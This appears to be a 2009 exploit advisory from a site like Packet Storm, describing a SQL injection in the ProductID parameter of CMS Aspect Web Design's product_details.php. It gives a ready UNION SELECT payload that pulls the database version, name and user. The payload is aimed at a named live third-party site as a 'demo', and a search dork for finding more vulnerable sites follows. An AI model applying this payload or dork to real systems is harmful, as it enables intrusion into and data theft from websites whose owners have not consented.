CMS Aspect Web Design suffers from a remote SQL injection vulnerability in product_details.php.
464d9d52f524f408573339caba9f680ce9f20e8b80ed6c603312852b880b03b6#*************************************************************************************************************************#
#Title : CMS Aspect Web Design [SQL INJECTION]
#*************************************************************************************************************************#
#Software : http://www.aspect.co.im/
#Date : 08/24/2009
#Author : R3VAN_BASTARD
#Contact : r3van[at]sux0r.net
#Blog : http://sux0r.net
#*************************************************************************************************************************#
#[o]Vulnerable file
#/product_details.php?ProductID=
#Note:"sometime location for the Vulnerability not same"
#*************************************************************************************************************************#
#[o] Exploit
#http://localhost/product_details.php?ProductID=[SQLi]
#*************************************************************************************************************************#
#[o]Demo:
#http://www.bestangle.co.uk/product_details.php?ProductID=-17+union+select+1,2,version(),database(),user(),6,7,8,9,10,11--
#*************************************************************************************************************************#
#[o] Dork: intext:"Aspect Web Design"
#***************************************************************#
#[o] Greetz
#My Love "Valencia"
#www.MainHack.com - www.ServerIsDown.org - www.sux0r.net
#VOP Crew [Vaksin13 * OoN_Boy * Paman]
#S3TAN * Kecemplungkalen * eminem *
#Yoga0400 * Pizzyroot * zny.Miciko *Madonk
#Jupe Crew [makasih buat ngenet gratisnya sama tempat maboknya]
#***************************************************************#
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed